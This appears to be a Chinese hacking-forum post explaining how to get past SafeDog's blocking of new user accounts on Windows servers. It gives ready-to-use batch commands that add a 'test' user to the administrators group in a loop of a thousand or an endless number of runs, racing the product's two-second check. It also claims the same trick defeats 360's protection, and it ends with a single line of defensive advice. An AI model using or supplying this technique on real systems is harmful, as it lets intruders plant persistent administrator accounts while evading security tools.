查看: 11|回覆: 0

[入侵防御] 安全狗下添加用户的另一方法(大量操作实现突破)

[複製鏈接]

2

主題

0

回帖

0

積分

热心网友

金币
0
閲讀權限
220
精華
0
威望
0
贡献
0
在線時間
0 小時
註冊時間
2009-10-1
發表於 2013-9-1 17:58:46 | 顯示全部樓層 |閲讀模式
前几天发现的,略无语,因为简单到。。

直接在命令行下使用

for /l %i in (1,1,1000) do @net user test test /add&@net localgroup administrators test /add 

另存为 ad.bat 使用

for /l %%i in (1,1,1000) do @net user test test /add&@net localgroup administrators test /add 

命令的意思是循环一千次执行do后面的命令add user

1.jpg

2.jpg

要说一下安全狗拦截添加用户的原理

安全狗的拦截并不是真正意义上的拦截,而是每2秒钟检测一次是否有新添加的用户,如果有新用户,则删除。

所以我们直接net user test test /add 是能够成功添加用户的,只不过两秒后被安全狗删除了而已。

上面的命令是不断的重复加用户的操作,直到1000次,大概两分钟就会执行完毕自动退出{远程登录test后,无论test是否已经被删除,都不会受到影响},如果需要无限循环,将括号内的数字改为(1,0,1)即可,然后记得要手动停止

3.jpg


每两秒检测一次

更无语的是,如果安全狗和360同时存在,那么360的拦截添加用户的功能将变得无效
直接使用上面那个命令即可

防范:安全钩+mcafee同时控制,基本上不会出现这个问题。

回覆

使用道具 舉報

您需要登錄後才可以回帖 登錄 | 立即注册

本版積分規則

相关侵权、举报、投诉及建议等,请发 E-mail:qiongdian@foxmail.com

Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

在本版发帖返回顶部